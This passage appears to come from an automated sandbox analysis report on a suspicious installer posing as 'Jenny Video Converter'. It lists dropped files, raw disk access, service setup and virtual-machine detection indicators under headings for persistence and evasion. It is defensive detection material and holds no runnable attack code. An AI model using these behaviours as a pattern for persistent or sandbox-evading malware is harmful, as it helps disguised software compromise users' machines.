        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040546D push eax; ret 3_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040553D push 00405749h; ret 3_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040F598 push ecx; mov dword ptr [esp], edx3_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004055BE push 00405749h; ret 3_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00459634 push 00459678h; ret 3_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040563B push 00405749h; ret 3_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004056A0 push 00405749h; ret 3_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004517E4 push 00451817h; ret 3_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004519A8 push ecx; mov dword ptr [esp], eax3_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00483A08 push 00483AF7h; ret 3_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00477A24 push ecx; mov dword ptr [esp], edx3_2_00477A25

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive08_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive08_2_02E2F7D6
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeFile created: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-89P6A.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-K6NUN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-OBUNB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-K7K0E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-C5452.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-J93O6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-HU6GR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-K7E1C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-V1USB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-UNA71.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-1GTV3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-QGIC5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-6D3ET.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-SKU3B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-CJ5EH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeFile created: C:\ProgramData\ET Ammeter Side 10.7.46\ET Ammeter Side 10.7.46.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-LKHV4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-GTTMJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-RSP19.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-K6ASR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-546FI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-A3JAA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-2700D.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-PC21V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-KPRR4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-JNPGG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-GVVRD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-4NH58.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-802JP.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeFile created: C:\ProgramData\ET Ammeter Side 10.7.46\ET Ammeter Side 10.7.46.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive08_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive08_2_02E2F7D6
        Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_0040224F lstrcmpiW,SetEvent,StartServiceCtrlDispatcherA,8_2_0040224F
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004241EC IsIconic,SetActiveWindow,SetFocus,3_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004241A4 IsIconic,SetActiveWindow,3_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,3_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,3_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,3_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004175A8 IsIconic,GetCapture,3_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00417CDE IsIconic,SetWindowPos,3_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_0041F128
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,8_2_00401B4B
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,8_2_02E2F8DA
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeWindow / User API: threadDelayed 9642Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-89P6A.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-K6NUN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-OBUNB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-K7K0E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-J93O6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-C5452.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-HU6GR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-11LMP.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-K7E1C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-V1USB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-UNA71.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-1GTV3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-QGIC5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-6D3ET.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)Jump to dropped file
